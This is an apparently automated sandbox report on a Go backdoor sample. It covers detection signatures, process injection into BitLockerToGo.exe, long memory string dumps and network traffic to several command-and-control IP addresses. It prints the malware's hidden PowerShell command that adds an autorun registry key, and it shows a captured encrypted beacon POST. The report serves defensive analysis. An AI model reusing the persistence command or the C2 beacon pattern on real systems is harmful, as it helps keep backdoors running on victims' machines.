Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
BwqqVoHR71.exe

Overview

General Information

Sample name:BwqqVoHR71.exe
renamed because original name is a hash value
Original sample name:0a21a94198f6157abb36bf55cb43be27.exe
Analysis ID:1537033
MD5:0a21a94198f6157abb36bf55cb43be27
SHA1:9a01b5e8a68be2b49250c730f8c3ecaee3734170
SHA256:53fcb9786b102a6ad732878445deb13132324e59487ac841cba4e38bb990bee6
Tags:exeuser-abuse_ch
Infos:

Detection

GO Backdoor
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected GO Backdoor
AI detected suspicious sample
Allocates memory in foreign processes
Creates an autostart registry key pointing to binary in C:\Windows
Found Tor onion address
Injects a PE file into a foreign processes
Suspicious powershell command line found
Writes to foreign memory regions
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • BwqqVoHR71.exe (PID: 7236 cmdline: "C:\Users\user\Desktop\BwqqVoHR71.exe" MD5: 0A21A94198F6157ABB36BF55CB43BE27)
    • BitLockerToGo.exe (PID: 7652 cmdline: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)
      • powershell.exe (PID: 7728 cmdline: powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe\" }" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 7736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • BitLockerToGo.exe (PID: 7896 cmdline: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: BitLockerToGo.exe PID: 7652JoeSecurity_GOBackdoorYara detected GO BackdoorJoe Security

    Sigma Signatures

    Sigma detected: CurrentVersion Autorun Keys Modification
    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7728, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\App
    Sigma detected: Non Interactive PowerShell Process Spawned
    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe\" }", CommandLine: powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe\" }", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe", ParentImage: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe, ParentProcessId: 7652, ParentProcessName: BitLockerToGo.exe, ProcessCommandLine: powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe\" }", ProcessId: 7728, ProcessName: powershell.exe

    Suricata Signatures

    No Suricata rule has matched

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Multi AV Scanner detection for submitted file
    Source: BwqqVoHR71.exeReversingLabs: Detection: 28%
    AI detected suspicious sample
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.0% probability
    Source: BwqqVoHR71.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: BwqqVoHR71.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
    Source: Binary string: BitLockerToGo.pdb source: BwqqVoHR71.exe, 00000000.00000002.1996663271.0000000002CCC000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: BitLockerToGo.pdbGCTL source: BwqqVoHR71.exe, 00000000.00000002.1996663271.0000000002CCC000.00000004.00001000.00020000.00000000.sdmp

    Networking

    barindex
    Found Tor onion address
    Source: BwqqVoHR71.exe, 00000000.00000002.1996663271.0000000003CF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: GoneDATAPING&lt;&gt;1080openStat.com.bat.cmdnullbooljson'\''quit3125Atoiint8uintchanfunccallkind != AhomChamKawiLisuMiaoModiNewaThaiTotoDashermssse3avx2bmi1bmi2bitsNameTypeFrom.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--asn1tag:false<nil>ErrorMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930defersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...]hostswriteclosefileshttpsimap2imap3imapspop3s:***@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&amp;&#34;&#39;chdirchmodLstatarray%s:%dyamuxlocalntohs1562578125int16int32int64uint8sliceAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermsse41sse42ssse3 (at ClassTypeAtls: Earlyparseutf-8%s*%dtext/.avif.html.jpeg.json.wasm.webpRealmbad nSHA-1P-224P-256P-384P-521ECDSAupdatekilledconfighiddenStringFormat[]bytestringSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13sysmontimersefenceselect, not objectstatusnetdns.locallisten.onionip+netreturnsocketacceptdomaingophertelnetClosedBasic CookiecookieexpectoriginserverclosedExpectPragmasocks LockedCANCELGOAWAYPADDEDactivesocks5renameexec: remotehangupGetACPsendto390625uint16uint32uint64structchan<-<-chan ValueArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphenrdtscppopcntcmd/go, val LengthTypeNSTypeMXheaderAnswerX25519%w%.0wAcceptServerSTREETwindowsfloat32float64TuesdayJanuaryOctoberMUI_StdMUI_DltforcegccpuprofunknowngctraceIO waitrunningUNKNOWN:eventswsarecvwsasendconnectopenbsdlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsolePATHEXTrefusedabortedCopySidFreeSidSleepExWSARecvWSASendsignal 19531259765625invaliduintptrSwapperChanDir Value>ConvertAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalos/execruntime::ffff:nil keyanswersTypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLderivedInitialExpiresSubjectcharsetSHA-224SHA-256SHA-384SHA-512#internDES-CBCEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5scavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKruntime.reflect.net/httpgo/buildx509sha1profBlockstackpoolhchanLeafwbufSpansmSpanDeadscavtraceinittracepanicwaitchan sendpreemptedinterfacectxt != 0atomicor8tracebackcomplex64pclmulqdqmath/randrwxrwxrwxtime.Date(time.LocalnotifyListprofInsertstackLargemSpanInUseGOMAXPROCSstop traceinvalidptrschedtracesemacquiredebug callGOMEMLIMITexitThreadBad varintatomicand8float64nanfloat32nanunknown pccomplex128execerrdothttp2debugcrypto/tlsassistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailcgocall nilunreachablebad m valuebad timedivfloat64nan1float64nan2float64nan3float32nan2gocachehashgocache
    Source: BwqqVoHR71.exe, 00000000.00000002.1996663271.00000000040F2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: GoneDATAPING&lt;&gt;1080openStat.com.bat.cmdnullbooljson'\''quit3125Atoiint8uintchanfunccallkind != AhomChamKawiLisuMiaoModiNewaThaiTotoDashermssse3avx2bmi1bmi2bitsNameTypeFrom.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--asn1tag:false<nil>ErrorMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930defersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...]hostswriteclosefileshttpsimap2imap3imapspop3s:***@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&amp;&#34;&#39;chdirchmodLstatarray%s:%dyamuxlocalntohs1562578125int16int32int64uint8sliceAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermsse41sse42ssse3 (at ClassTypeAtls: Earlyparseutf-8%s*%dtext/.avif.html.jpeg.json.wasm.webpRealmbad nSHA-1P-224P-256P-384P-521ECDSAupdatekilledconfighiddenStringFormat[]bytestringSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13sysmontimersefenceselect, not objectstatusnetdns.locallisten.onionip+netreturnsocketacceptdomaingophertelnetClosedBasic CookiecookieexpectoriginserverclosedExpectPragmasocks LockedCANCELGOAWAYPADDEDactivesocks5renameexec: remotehangupGetACPsendto390625uint16uint32uint64structchan<-<-chan ValueArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphenrdtscppopcntcmd/go, val LengthTypeNSTypeMXheaderAnswerX25519%w%.0wAcceptServerSTREETwindowsfloat32float64TuesdayJanuaryOctoberMUI_StdMUI_DltforcegccpuprofunknowngctraceIO waitrunningUNKNOWN:eventswsarecvwsasendconnectopenbsdlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsolePATHEXTrefusedabortedCopySidFreeSidSleepExWSARecvWSASendsignal 19531259765625invaliduintptrSwapperChanDir Value>ConvertAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalos/execruntime::ffff:nil keyanswersTypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLderivedInitialExpiresSubjectcharsetSHA-224SHA-256SHA-384SHA-512#internDES-CBCEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5scavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKruntime.reflect.net/httpgo/buildx509sha1profBlockstackpoolhchanLeafwbufSpansmSpanDeadscavtraceinittracepanicwaitchan sendpreemptedinterfacectxt != 0atomicor8tracebackcomplex64pclmulqdqmath/randrwxrwxrwxtime.Date(time.LocalnotifyListprofInsertstackLargemSpanInUseGOMAXPROCSstop traceinvalidptrschedtracesemacquiredebug callGOMEMLIMITexitThreadBad varintatomicand8float64nanfloat32nanunknown pccomplex128execerrdothttp2debugcrypto/tlsassistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailcgocall nilunreachablebad m valuebad timedivfloat64nan1float64nan2float64nan3float32nan2gocachehashgocache
    Source: BwqqVoHR71.exe, 00000000.00000002.1996663271.00000000050A6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: GoneDATAPING&lt;&gt;1080openStat.com.bat.cmdnullbooljson'\''quit3125Atoiint8uintchanfunccallkind != AhomChamKawiLisuMiaoModiNewaThaiTotoDashermssse3avx2bmi1bmi2bitsNameTypeFrom.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--asn1tag:false<nil>ErrorMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930defersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...]hostswriteclosefileshttpsimap2imap3imapspop3s:***@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&amp;&#34;&#39;chdirchmodLstatarray%s:%dyamuxlocalntohs1562578125int16int32int64uint8sliceAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermsse41sse42ssse3 (at ClassTypeAtls: Earlyparseutf-8%s*%dtext/.avif.html.jpeg.json.wasm.webpRealmbad nSHA-1P-224P-256P-384P-521ECDSAupdatekilledconfighiddenStringFormat[]bytestringSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13sysmontimersefenceselect, not objectstatusnetdns.locallisten.onionip+netreturnsocketacceptdomaingophertelnetClosedBasic CookiecookieexpectoriginserverclosedExpectPragmasocks LockedCANCELGOAWAYPADDEDactivesocks5renameexec: remotehangupGetACPsendto390625uint16uint32uint64structchan<-<-chan ValueArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphenrdtscppopcntcmd/go, val LengthTypeNSTypeMXheaderAnswerX25519%w%.0wAcceptServerSTREETwindowsfloat32float64TuesdayJanuaryOctoberMUI_StdMUI_DltforcegccpuprofunknowngctraceIO waitrunningUNKNOWN:eventswsarecvwsasendconnectopenbsdlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsolePATHEXTrefusedabortedCopySidFreeSidSleepExWSARecvWSASendsignal 19531259765625invaliduintptrSwapperChanDir Value>ConvertAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalos/execruntime::ffff:nil keyanswersTypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLderivedInitialExpiresSubjectcharsetSHA-224SHA-256SHA-384SHA-512#internDES-CBCEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5scavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKruntime.reflect.net/httpgo/buildx509sha1profBlockstackpoolhchanLeafwbufSpansmSpanDeadscavtraceinittracepanicwaitchan sendpreemptedinterfacectxt != 0atomicor8tracebackcomplex64pclmulqdqmath/randrwxrwxrwxtime.Date(time.LocalnotifyListprofInsertstackLargemSpanInUseGOMAXPROCSstop traceinvalidptrschedtracesemacquiredebug callGOMEMLIMITexitThreadBad varintatomicand8float64nanfloat32nanunknown pccomplex128execerrdothttp2debugcrypto/tlsassistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailcgocall nilunreachablebad m valuebad timedivfloat64nan1float64nan2float64nan3float32nan2gocachehashgocache
    Source: BwqqVoHR71.exe, 00000000.00000002.1996663271.0000000004AC3000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: GoneDATAPING&lt;&gt;1080openStat.com.bat.cmdnullbooljson'\''quit3125Atoiint8uintchanfunccallkind != AhomChamKawiLisuMiaoModiNewaThaiTotoDashermssse3avx2bmi1bmi2bitsNameTypeFrom.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--asn1tag:false<nil>ErrorMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930defersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...]hostswriteclosefileshttpsimap2imap3imapspop3s:***@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&amp;&#34;&#39;chdirchmodLstatarray%s:%dyamuxlocalntohs1562578125int16int32int64uint8sliceAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermsse41sse42ssse3 (at ClassTypeAtls: Earlyparseutf-8%s*%dtext/.avif.html.jpeg.json.wasm.webpRealmbad nSHA-1P-224P-256P-384P-521ECDSAupdatekilledconfighiddenStringFormat[]bytestringSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13sysmontimersefenceselect, not objectstatusnetdns.locallisten.onionip+netreturnsocketacceptdomaingophertelnetClosedBasic CookiecookieexpectoriginserverclosedExpectPragmasocks LockedCANCELGOAWAYPADDEDactivesocks5renameexec: remotehangupGetACPsendto390625uint16uint32uint64structchan<-<-chan ValueArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphenrdtscppopcntcmd/go, val LengthTypeNSTypeMXheaderAnswerX25519%w%.0wAcceptServerSTREETwindowsfloat32float64TuesdayJanuaryOctoberMUI_StdMUI_DltforcegccpuprofunknowngctraceIO waitrunningUNKNOWN:eventswsarecvwsasendconnectopenbsdlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsolePATHEXTrefusedabortedCopySidFreeSidSleepExWSARecvWSASendsignal 19531259765625invaliduintptrSwapperChanDir Value>ConvertAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalos/execruntime::ffff:nil keyanswersTypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLderivedInitialExpiresSubjectcharsetSHA-224SHA-256SHA-384SHA-512#internDES-CBCEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5scavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKruntime.reflect.net/httpgo/buildx509sha1profBlockstackpoolhchanLeafwbufSpansmSpanDeadscavtraceinittracepanicwaitchan sendpreemptedinterfacectxt != 0atomicor8tracebackcomplex64pclmulqdqmath/randrwxrwxrwxtime.Date(time.LocalnotifyListprofInsertstackLargemSpanInUseGOMAXPROCSstop traceinvalidptrschedtracesemacquiredebug callGOMEMLIMITexitThreadBad varintatomicand8float64nanfloat32nanunknown pccomplex128execerrdothttp2debugcrypto/tlsassistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailcgocall nilunreachablebad m valuebad timedivfloat64nan1float64nan2float64nan3float32nan2gocachehashgocache
    Source: BitLockerToGo.exe, 00000005.00000002.3047534110.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: GoneDATAPING&lt;&gt;1080openStat.com.bat.cmdnullbooljson'\''quit3125Atoiint8uintchanfunccallkind != AhomChamKawiLisuMiaoModiNewaThaiTotoDashermssse3avx2bmi1bmi2bitsNameTypeFrom.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--asn1tag:false<nil>ErrorMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930defersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...]hostswriteclosefileshttpsimap2imap3imapspop3s:***@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&amp;&#34;&#39;chdirchmodLstatarray%s:%dyamuxlocalntohs1562578125int16int32int64uint8sliceAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermsse41sse42ssse3 (at ClassTypeAtls: Earlyparseutf-8%s*%dtext/.avif.html.jpeg.json.wasm.webpRealmbad nSHA-1P-224P-256P-384P-521ECDSAupdatekilledconfighiddenStringFormat[]bytestringSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13sysmontimersefenceselect, not objectstatusnetdns.locallisten.onionip+netreturnsocketacceptdomaingophertelnetClosedBasic CookiecookieexpectoriginserverclosedExpectPragmasocks LockedCANCELGOAWAYPADDEDactivesocks5renameexec: remotehangupGetACPsendto390625uint16uint32uint64structchan<-<-chan ValueArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphenrdtscppopcntcmd/go, val LengthTypeNSTypeMXheaderAnswerX25519%w%.0wAcceptServerSTREETwindowsfloat32float64TuesdayJanuaryOctoberMUI_StdMUI_DltforcegccpuprofunknowngctraceIO waitrunningUNKNOWN:eventswsarecvwsasendconnectopenbsdlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsolePATHEXTrefusedabortedCopySidFreeSidSleepExWSARecvWSASendsignal 19531259765625invaliduintptrSwapperChanDir Value>ConvertAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalos/execruntime::ffff:nil keyanswersTypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLderivedInitialExpiresSubjectcharsetSHA-224SHA-256SHA-384SHA-512#internDES-CBCEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5scavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKruntime.reflect.net/httpgo/buildx509sha1profBlockstackpoolhchanLeafwbufSpansmSpanDeadscavtraceinittracepanicwaitchan sendpreemptedinterfacectxt != 0atomicor8tracebackcomplex64pclmulqdqmath/randrwxrwxrwxtime.Date(time.LocalnotifyListprofInsertstackLargemSpanInUseGOMAXPROCSstop traceinvalidptrschedtracesemacquiredebug callGOMEMLIMITexitThreadBad varintatomicand8float64nanfloat32nanunknown pccomplex128execerrdothttp2debugcrypto/tlsassistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailcgocall nilunreachablebad m valuebad timedivfloat64nan1float64nan2float64nan3float32nan2gocachehashgocache
    Source: Joe Sandbox ViewIP Address: 46.8.232.106 46.8.232.106
    Source: Joe Sandbox ViewIP Address: 93.185.159.253 93.185.159.253
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
    Source: unknownTCP traffic detected without corresponding DNS query: 93.185.159.253
    Source: unknownTCP traffic detected without corresponding DNS query: 93.185.159.253
    Source: unknownTCP traffic detected without corresponding DNS query: 93.185.159.253
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
    Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
    Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
    Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
    Source: unknownTCP traffic detected without corresponding DNS query: 93.185.159.253
    Source: unknownTCP traffic detected without corresponding DNS query: 188.130.206.243
    Source: unknownTCP traffic detected without corresponding DNS query: 188.130.206.243
    Source: unknownTCP traffic detected without corresponding DNS query: 188.130.206.243
    Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
    Source: unknownTCP traffic detected without corresponding DNS query: 188.130.206.243
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
    Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
    Source: unknownTCP traffic detected without corresponding DNS query: 93.185.159.253
    Source: unknownTCP traffic detected without corresponding DNS query: 188.130.206.243
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
    Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
    Source: unknownTCP traffic detected without corresponding DNS query: 93.185.159.253
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
    Source: unknownTCP traffic detected without corresponding DNS query: 93.185.159.253
    Source: unknownTCP traffic detected without corresponding DNS query: 93.185.159.253
    Source: unknownTCP traffic detected without corresponding DNS query: 93.185.159.253
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
    Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
    Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
    Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
    Source: unknownTCP traffic detected without corresponding DNS query: 93.185.159.253
    Source: unknownTCP traffic detected without corresponding DNS query: 188.130.206.243
    Source: unknownTCP traffic detected without corresponding DNS query: 188.130.206.243
    Source: unknownTCP traffic detected without corresponding DNS query: 188.130.206.243
    Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
    Source: unknownTCP traffic detected without corresponding DNS query: 188.130.206.243
    Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
    Source: unknownHTTP traffic detected: POST / HTTP/1.1Host: 46.8.232.106User-Agent: Go-http-client/1.1Content-Length: 162X-Api-Key: X2qB4QsFAccept-Encoding: gzipData Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 04 0d 38 08 54 50 56 07 2c 26 03 33 08 54 2c 1e 31 10 08 14 5f 38 13 1f 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 3a 1a 0b 2e 07 23 12 1d 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 2e 39 25 2d 24 2b 52 31 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 50 07 17 48 02 23 34 5c 5f 17 28 45 4f 4d 03 02 5c 45 59 4d 0f 50 5d 05 06 0e 0c 53 0d 53 56 5e 58 04 0c 04 02 5b 0d 52 59 05 51 5a 0a 05 59 04 52 0c 0a 5e 4b 1a Data Ascii: M*L\K8TPV,&3T,1_8EOM:DSE:.#LJK9AUL.9%-$+R1EOM9L\KWPH#4\_(EOM\EYMP]SSV^X[RYQZYR^K
    Source: BitLockerToGo.exe, 00000005.00000002.3048724976.000000000BD46000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://188.130.206.243
    Source: BitLockerToGo.exe, 00000005.00000002.3048724976.000000000BD46000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://188.130.206.243http://46.8.232.106
    Source: BitLockerToGo.exe, 00000005.00000002.3048724976.000000000BD46000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://46.8.232.106
    Source: BitLockerToGo.exe, 00000005.00000002.3048724976.000000000BD46000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://46.8.236.61
